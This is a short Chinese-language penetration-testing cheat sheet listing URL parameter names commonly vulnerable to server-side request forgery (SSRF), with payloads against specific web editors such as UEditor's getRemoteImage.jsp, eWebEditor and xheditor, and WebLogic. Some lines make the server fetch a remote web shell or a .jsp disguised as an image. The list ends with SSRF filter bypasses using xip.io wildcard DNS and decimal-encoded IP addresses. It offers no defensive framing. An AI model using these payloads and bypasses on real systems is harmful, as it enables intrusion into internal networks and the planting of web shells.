URL中与SSRF相关的字段
relativePath
url
site
path
message=[img]http://myserver/wshell.php?logo.jpg[/img]
query
src
src_url
sr
id
vtTopicId //ebs
operator(weblogic:SearchPublicRegistries)
inputFile
column_url
preview
sIconUrl/sUrl
picPath
qrcodeUrl
fileName
upfile(ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg)
img
source
pageurl
redirect
Ueditor imageUp.jsp controller.php getRemoteImage.jsp source[] upfile
ewebeditr eWebEditor_UploadText
xheditor saveremoteimg
proxy?s=
view_img.php
imgurl
link
href
apiurl
resourceUrl
SSRF绕过:
http://10.13.199.124.xip.io:8080
www.127.0.0.1.xip.io
http://168675196:8080 可以将IP转换为10进制绕过